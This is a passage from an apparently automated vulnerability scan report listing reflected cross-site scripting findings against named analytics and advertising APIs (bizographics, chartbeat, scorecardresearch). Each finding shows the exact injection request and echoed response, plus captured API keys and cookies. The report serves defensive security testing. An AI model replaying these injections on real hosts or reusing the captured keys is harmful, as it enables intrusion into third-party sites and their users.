Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 2212
Set-Cookie: 28969=ADCAD0B8.1C14A0.2.14FCEB.2.0.4E2AD12F.1C0F21.13705BE.14B2.1;expires=Sat, 30 Jul 2011 13:48:31 GMT;domain=adserver.adtechus.com;path=/

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
if (!__bCodeFlushed) {
var span = parent.document.createElement("SPAN"
...[SNIP]...
dia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?&f8501"-alert(1)-"733d4dc846b=1http://www.smiletrain.org?s_src=BANNER_BostonGlobe01&utm_source=Boston&utm_campaign=valueadd&utm_medium=display\" target=\"_blank\">
...[SNIP]...

3.37. http://api.bizographics.com/v1/profile.json [&callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 8e28a<script>alert(1)</script>86b474bc84f was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData8e28a<script>alert(1)</script>86b474bc84f&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=tpCKokqYoGQhUXUii5DtcSNQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2GokttNiptM6FExkNK7HUtFp4B4dlWpgdhSIRMejJJHYD8l3ZY0x538oYYx7zFKAiiaQIFsisgNSNyapcheyl9qqj5isLeKJDB2UPGjg3vXDjpIpvQ2ul4q8MQQAdGRQisgNGpunspyGhHwpKMTlyYtq6Za6UAkBPsFfYeuxE6rBNXvlsMJ7hbaahMwGHWJy7cP8bcdojm5is3wEUThITfFDIipF2rkN6WsamcD5VW1iiLhR1ipFUs24V52t2cN1qss1vBdTs9TcInbC13AzyJVMisQS3uIkipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisHP1G6sC1FckSLE2C8oCp9uCwcaIYpAt5zvJh0QDyipWUVtAQ9nxHLCs8DdoSbabpX; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sat, 23 Jul 2011 04:31:19 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1I9O39eYN6IlExkNK7HUtFp4B4dlWpgdhVexhDCjVbgz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 552
Connection: keep-alive

dj.module.ad.bio.loadBizoData8e28a<script>alert(1)</script>86b474bc84f({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...

3.38. http://api.bizographics.com/v1/profile.json [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 7d991<script>alert(1)</script>e4631ba329e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun7d991<script>alert(1)</script>e4631ba329e HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=tpCKokqYoGQhUXUii5DtcSNQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2GokttNiptM6FExkNK7HUtFp4B4dlWpgdhSIRMejJJHYD8l3ZY0x538oYYx7zFKAiiaQIFsisgNSNyapcheyl9qqj5isLeKJDB2UPGjg3vXDjpIpvQ2ul4q8MQQAdGRQisgNGpunspyGhHwpKMTlyYtq6Za6UAkBPsFfYeuxE6rBNXvlsMJ7hbaahMwGHWJy7cP8bcdojm5is3wEUThITfFDIipF2rkN6WsamcD5VW1iiLhR1ipFUs24V52t2cN1qss1vBdTs9TcInbC13AzyJVMisQS3uIkipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisHP1G6sC1FckSLE2C8oCp9uCwcaIYpAt5zvJh0QDyipWUVtAQ9nxHLCs8DdoSbabpX; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 04:31:21 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun7d991<script>alert(1)</script>e4631ba329e)

3.39. http://api.bizographics.com/v1/profile.redirect [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 1ffb0<script>alert(1)</script>08b494b6eae was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a51ffb0<script>alert(1)</script>08b494b6eae&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=53%26sei=21%26sci=1%26sai=0%26smi=0%26pbi=0%26sts=1311428797730419%26sui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0awupiiJtt7A1ExkNK7HUtFp4B4dlWpgdgfBIoZ4uj4Tz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 13:49:15 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a51ffb0<script>alert(1)</script>08b494b6eae)

3.40. http://api.bizographics.com/v1/profile.redirect [callback_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload a0894<script>alert(1)</script>80c70e92325 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=a0894<script>alert(1)</script>80c70e92325 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0awupiiJtt7A1ExkNK7HUtFp4B4dlWpgdgfBIoZ4uj4Tz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 13:49:17 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: a0894<script>alert(1)</script>80c70e92325

3.41. http://api.chartbeat.com/toppages/ [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.chartbeat.com
Path:	/toppages/

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload db4b0<script>alert(1)</script>71de4d7e894 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toppages/?host=observer.com&jsonp=chartbeat_top_pages.cback3471572db4b0<script>alert(1)</script>71de4d7e894&apikey=e58ef8b1512d5591696ca4b8badf20b9&limit=20 HTTP/1.1
Host: api.chartbeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 21 Jul 2011 16:12:58 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 3697

chartbeat_top_pages.cback3471572db4b0<script>alert(1)</script>71de4d7e894([{"i": "The New York Observer", "path": "\/", "visitors": 80}, {"i": "Cond\u00e9 Nast Is Experiencing Technical Difficulties | The New York Observer", "path": "\/2011\/07\/scott-dadich-ipad-conde-nast
...[SNIP]...

3.42. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload e7f85<script>alert(1)</script>8e46a0d32e1 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8e7f85<script>alert(1)</script>8e46a0d32e1&c2=6035308&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:48 GMT
Date: Sat, 23 Jul 2011 04:48:48 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8e7f85<script>alert(1)</script>8e46a0d32e1", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.43. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 69d7d<script>alert(1)</script>bd4bc215a3 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=&c10=69d7d<script>alert(1)</script>bd4bc215a3&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:50 GMT
Date: Sat, 23 Jul 2011 04:48:50 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"69d7d<script>alert(1)</script>bd4bc215a3", c15:"", c16:"", r:""});

3.44. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 6f3bf<script>alert(1)</script>617bda7171c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=&c10=&c15=6f3bf<script>alert(1)</script>617bda7171c HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:50 GMT
Date: Sat, 23 Jul 2011 04:48:50 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"6f3bf<script>alert(1)</script>617bda7171c", c16:"", r:""});

3.45. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e1585<script>alert(1)</script>9de0649acd8 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308e1585<script>alert(1)</script>9de0649acd8&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
